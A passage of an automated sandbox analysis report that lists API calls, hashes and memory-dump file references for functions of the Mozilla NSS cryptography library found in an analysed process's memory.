Part of subcall function 6BC79BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6BBA1A48), ref: 6BC79BC8

getprotobynumber.WSOCK32(?), ref: 6BCC8959
GetLastError.KERNEL32(?), ref: 6BCC8967
PR_GetCurrentThread.NSS3(?,?), ref: 6BCC896F
PR_Unlock.NSS3(?,?), ref: 6BCC898A

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 4765fc83aa86df074a6ff602f9b12ef3f7b84992e522ef18b30c8cd698d86866
Instruction ID: 067a35b8dfeba563ea83283271e5afe7742e32e9e5e490550f5a44ee8a4093fc
Opcode Fuzzy Hash: 4765fc83aa86df074a6ff602f9b12ef3f7b84992e522ef18b30c8cd698d86866
Instruction Fuzzy Hash: AD110272D30120ABCB109FB89801A1B7768EF56334F0502B5EC19972A2E738CE01CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC8B50 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6BBD0948,00000000), ref: 6BBC8B6B
EnterCriticalSection.KERNEL32(?,?,?,6BBD0948,00000000), ref: 6BBC8B80
PL_FinishArenaPool.NSS3(?,?,?,?,6BBD0948,00000000), ref: 6BBC8B8F
PR_Unlock.NSS3(?,?,?,?,6BBD0948,00000000), ref: 6BBC8BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6BBD0948,00000000), ref: 6BBC8BAC
free.MOZGLUE(?,?,?,?,?,6BBD0948,00000000), ref: 6BBC8BB8

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID:
API String ID: 1456478736-0
Opcode ID: 6ab2e55d2725a435347e0136ed8214b0f2ced76e3e1c40ffb7aaa632bd04a842
Instruction ID: 8d8af6bcf5faa501ec84c1f4ce5616ade8c856daec2ceca48e5bf09455613be0
Opcode Fuzzy Hash: 6ab2e55d2725a435347e0136ed8214b0f2ced76e3e1c40ffb7aaa632bd04a842
Instruction Fuzzy Hash: E51148B1404A458FEB00BF78C48A13EBBF4FF05254F05496ED8858B200EB39E595CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCAB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6BBD1397,5B5F5EC0,?,?,6BBCB1EE,2404110F,?,?), ref: 6BBCAB3C
free.MOZGLUE(D958E836,?,6BBCB1EE,2404110F,?,?), ref: 6BBCAB49
DeleteCriticalSection.KERNEL32(5D5E6BDC), ref: 6BBCAB5C
free.MOZGLUE(5D5E6BD0), ref: 6BBCAB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6BBCAB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6BBCAB76

Part of subcall function 6BBFF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BBFF854
Part of subcall function 6BBFF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BBFF868
Part of subcall function 6BBFF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BBFF882
Part of subcall function 6BBFF820: free.MOZGLUE(04C483FF,?,?), ref: 6BBFF889
Part of subcall function 6BBFF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BBFF8A4
Part of subcall function 6BBFF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BBFF8AB
Part of subcall function 6BBFF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BBFF8C9
Part of subcall function 6BBFF820: free.MOZGLUE(280F10EC,?,?), ref: 6BBFF8D0

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 2f8c0548dd14e9ffbea9dad11bbc4633ae5e0f2d8a768b35f8298e7c368f3b25
Instruction ID: bc94f77a3527feee8b5fb7e50be5ed25f734e034ff84904260442aa0d99a6da7
Opcode Fuzzy Hash: 2f8c0548dd14e9ffbea9dad11bbc4633ae5e0f2d8a768b35f8298e7c368f3b25
Instruction Fuzzy Hash: DB0171B2800645ABDA11DFB4DC8485BB3BCEA457353080529E91987640E73AF45ADBF2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC4B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BBC4B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BBC4B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6BBC4B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6BBC4BB7

Part of subcall function 6BC10D30: calloc.MOZGLUE ref: 6BC10D50
Part of subcall function 6BC10D30: TlsGetValue.KERNEL32 ref: 6BC10D6D

Strings

, xrefs: 6BBC4B8A

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: 4a60bd56f09a70136531775d567452a5b84e181601a63c212f3fa5d7c51440e6
Instruction ID: 07a19d7a9e6f864e4881b32518e1c5da8f0a5809eb429c6e6979ef9167ff573a
Opcode Fuzzy Hash: 4a60bd56f09a70136531775d567452a5b84e181601a63c212f3fa5d7c51440e6
Instruction Fuzzy Hash: 142108B1D0028A5BDF10CA699C42BAFB7B4EF80318F100165E939A6191F7259715C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 6BBECAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BBCB1EE,D958E836,?,6BC051C5), ref: 6BBECAFA
PR_UnloadLibrary.NSS3(?,6BC051C5), ref: 6BBECB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BBCB1EE,D958E836,?,6BC051C5), ref: 6BBECB2C
PR_UnloadLibrary.NSS3(6BC051C5), ref: 6BBECB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6BBECAF5, 6BBECB27

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: 958b789a5cef38fd98a1aa936310e841bc032cb12ec078999a7278880f55d8b4
Instruction ID: b0e5929e5315937a6ee5b4dde8f6b907d0a363a2a26bd965851896e1d4d0433e
Opcode Fuzzy Hash: 958b789a5cef38fd98a1aa936310e841bc032cb12ec078999a7278880f55d8b4
Instruction Fuzzy Hash: A411DFF1D04A559BE740DB34D802749FBB4FB02B88F40406AD9148A160E77AE093CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCCB60 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6BBD57DF,00000000,?,00000002,6BBD5840,?), ref: 6BBCCBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6BBD57DF,00000000,?,00000002,6BBD5840,?), ref: 6BBCCC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6BBD57DF,00000000,?,00000002,6BBD5840), ref: 6BBCCC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BBCCC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBCCD50

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: a3fc9acd6fbfbe8aa604c3dad86aeceec13e2b448ee343c7a459bc0e7c893897
Instruction ID: 4348991251c684680df593916bcff7382e647cbf6379d869ecd9de71532418bd
Opcode Fuzzy Hash: a3fc9acd6fbfbe8aa604c3dad86aeceec13e2b448ee343c7a459bc0e7c893897
Instruction Fuzzy Hash: D4919F76E002599FDB00CFA8E881A9FBBB5FF59314F050068E905AB311E739E951CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB4A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9da5059e1581daa502174a9e150b84f5d7398ca8dc7870894a8950ec45e154
Instruction ID: 1c64e49d713f316b79394ac3ec26ec3b69dd19659e1c6d8d31a0b8d1d82b8c27
Opcode Fuzzy Hash: 0f9da5059e1581daa502174a9e150b84f5d7398ca8dc7870894a8950ec45e154
Instruction Fuzzy Hash: 9691AFB1A002448FFB08DFA4D9CAB6AB7B9FB46305F04007DE5464B245DB78E986DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB8B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6BBB8B5C
CERT_DecodeAVAValue.NSS3 ref: 6BBB8B67

Part of subcall function 6BBB8E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BBB8EED
Part of subcall function 6BBB8E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6BCE18D0,?), ref: 6BBB8F03
Part of subcall function 6BBB8E00: PR_CallOnce.NSS3(6BD12AA4,6BC112D0), ref: 6BBB8F19
Part of subcall function 6BBB8E00: PL_FreeArenaPool.NSS3(?), ref: 6BBB8F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6BBB8D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BBB8D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BBB8D76

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: 984a71caa682f8fd98785ffa6b194bd7d2842c9de4c081cfef62d4eba8288ed1
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: 187119B1F416668FDB248B588C507BEB7F2EB49321F09426AD828973D1DB799C01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCC9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6BBCCA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6BBCCA35
PR_Unlock.NSS3(00000000), ref: 6BBCCA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6BBCCA77
PR_Unlock.NSS3(00000000), ref: 6BBCCAFC

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 9eb173eb8530ecef271fce4acb28dedcc1fcf1b6cc3ac1a9b090005500286027
Instruction ID: 0236b1b69d5b9972b975c8ecb27b1286df8e8a2af4f9eed1f6fa698669b474e4
Opcode Fuzzy Hash: 9eb173eb8530ecef271fce4acb28dedcc1fcf1b6cc3ac1a9b090005500286027
Instruction Fuzzy Hash: BD41D076E002459FEB00CF64DC45A6BBBB4EF55344F1440A8ED189B311EB35E911CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC24A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6BC24A8D
CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6BC24B01
CERT_DestroyCertificate.NSS3(00000000), ref: 6BC24B12
PR_SetError.NSS3(?,00000000), ref: 6BC24B1F
CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6BC24B35

Part of subcall function 6BC204A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6BC204B9
Part of subcall function 6BC204A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6BC2050A
Part of subcall function 6BC204A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6BC20545

Part of subcall function 6BC252E0: PORT_NewArena_Util.NSS3(00000400,6BC24A57,?,00000000), ref: 6BC252F7
Part of subcall function 6BC252E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6BCE301C,6BC24A57,?,6BC24A57,?,00000000), ref: 6BC25312
Part of subcall function 6BC252E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6BC24A57,?,00000000), ref: 6BC25327
Part of subcall function 6BC252E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6BC24A57,?,00000000), ref: 6BC25334

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
String ID:
API String ID: 3052039812-0
Opcode ID: 102af53c4e04f3548422474ddf80e18a66dba9fcf67e390a9eef667ac98ebc2b
Instruction ID: 4f6ab877001024e506a47caec94b1969df997633fde93781d8f1441aeda7de8e
Opcode Fuzzy Hash: 102af53c4e04f3548422474ddf80e18a66dba9fcf67e390a9eef667ac98ebc2b
Instruction Fuzzy Hash: D131C7B5E216009BFB159E76AC52B3B3768AF05719F0540B4DE049A242F73DDB01C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6BBF6AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBF6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6BBF6943
Part of subcall function 6BBF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6BBF6957
Part of subcall function 6BBF6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6BBF6972
Part of subcall function 6BBF6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6BBF6983
Part of subcall function 6BBF6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6BBF69AA
Part of subcall function 6BBF6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6BBF69BE
Part of subcall function 6BBF6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6BBF69D2
Part of subcall function 6BBF6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6BBF69DF
Part of subcall function 6BBF6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6BBF6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6BF7
free.MOZGLUE(6BBF781D,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?,00000000,00000000), ref: 6BBF6C08

Part of subcall function 6BBF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6BBF781D,00000000,6BBEBE2C,?,6BBF6B1D,?,?,?,?,00000000,00000000,6BBF781D), ref: 6BBF6C40
Part of subcall function 6BBF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6BBF781D,?,6BBEBE2C,?), ref: 6BBF6C58
Part of subcall function 6BBF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6BBF781D), ref: 6BBF6C6F
Part of subcall function 6BBF6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6BBF6C84
Part of subcall function 6BBF6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6BBF6C96
Part of subcall function 6BBF6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6BBF6CAA

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID:
API String ID: 3779992554-0
Opcode ID: 90ee9678227f7c43bc422b2d78fe51050753ed150c16ff410cd16dc42e441619
Instruction ID: af771489584b2ec6123d96210893a8fbd6177c82218be7fb4cf7eea952fc2939
Opcode Fuzzy Hash: 90ee9678227f7c43bc422b2d78fe51050753ed150c16ff410cd16dc42e441619
Instruction Fuzzy Hash: 5241A271E042999BEF00CFE5C942B9EB7BCEF09384F000069DC16A7201E778E94ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 6BC04B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6BBF7B3B,00000000,?,?,00000000), ref: 6BC04BA3

Part of subcall function 6BC08970: TlsGetValue.KERNEL32(?,00000000,6BBB61C4,?,6BBB5639,00000000), ref: 6BC08991
Part of subcall function 6BC08970: TlsGetValue.KERNEL32(?,?,?,?,?,6BBB5639,00000000), ref: 6BC089AD
Part of subcall function 6BC08970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BBB5639,00000000), ref: 6BC089C6
Part of subcall function 6BC08970: PR_WaitCondVar.NSS3 ref: 6BC089F7
Part of subcall function 6BC08970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6BBB5639,00000000), ref: 6BC08A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BC04B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BC04B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6BC04C44
free.MOZGLUE(?), ref: 6BC04C54

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 487e80089e729a9661842f87247282cc2c852e2cd4dd898c0288f6f3afe2f021
Instruction ID: 8cb004c2afd4bc372917a8475e4e3deceb4bc3a0e9b658c2860e051afcd0bd06
Opcode Fuzzy Hash: 487e80089e729a9661842f87247282cc2c852e2cd4dd898c0288f6f3afe2f021
Instruction Fuzzy Hash: C34181B5A156059BEB108F69DC42B17B3B9EF61719F144164D829AB300FB3BFA20CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCAA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BCCAA86

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

Part of subcall function 6BCCA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6BCCA662), ref: 6BCCA69E
